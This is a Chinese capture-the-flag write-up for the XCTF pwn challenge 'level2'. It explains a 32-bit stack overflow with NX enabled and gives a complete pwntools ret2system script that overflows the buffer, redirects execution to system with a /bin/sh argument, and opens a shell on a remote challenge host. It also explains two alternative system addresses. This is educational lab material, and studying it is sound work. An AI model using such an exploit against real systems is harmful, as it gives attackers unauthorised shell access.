攻防世界xctf PWN leve2详细讲解,两个地址方法

文章描述了一种利用32位程序的漏洞进行溢出攻击的方法,通过启用NX防护后找到/bin/sh字符串和system函数,通过调整返回地址和参数实现shell命令执行。着重解释了system_addr的不同地址含义以及payload构建技巧。

看题
在这里插入图片描述
常规看下保护:
在这里插入图片描述
32位程序,启用的保护不多,启用了NX防护
IDA看下代码
在这里插入图片描述
在这里插入图片描述
可以看到有一个溢出
在这里插入图片描述
/bin/sh 字符串有,system函数也有,齐活了。溢出把返回地址改成system的地址,再加/bin/sh参数就能拿到shell了。

上代码:

from pwn import *
context.arch = 'i386'
context.log_level="debug"

#system_addr=0x08048320
system_addr=0x0804849e

bin_bash_addr=0x0804A024

#payload=b"A"*0x88+b"BBBB"+p32(system_addr)+p32(0)+p32(bin_bash_addr)
payload=b"A"*0x88+b"BBBB"+p32(system_addr)+p32(bin_bash_addr)

#p = process("./leve2")
p = remote("61.147.171.105",51122)

p.recvline()
p.sendline(payload)
p.interactive()

这里有一点要说,system_addr有两个地址,一个是0x0804849e,一个是0x08048320,0x0804849e对应的代码是call _system,而0x08048320就是system函数的地址。区别就在于一个有call,一个没有call,有call就不需要在返回地址后面再加一个栈帧(也就是system的返回地址),直接接参数,因为call会压一次栈,把下一条指令的地址(返回地址)压入栈,其实也是p32(system_addr)+p32(0)+p32(bin_bash_addr)这个结构,因为system会取前第两个栈帧的值当参数。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值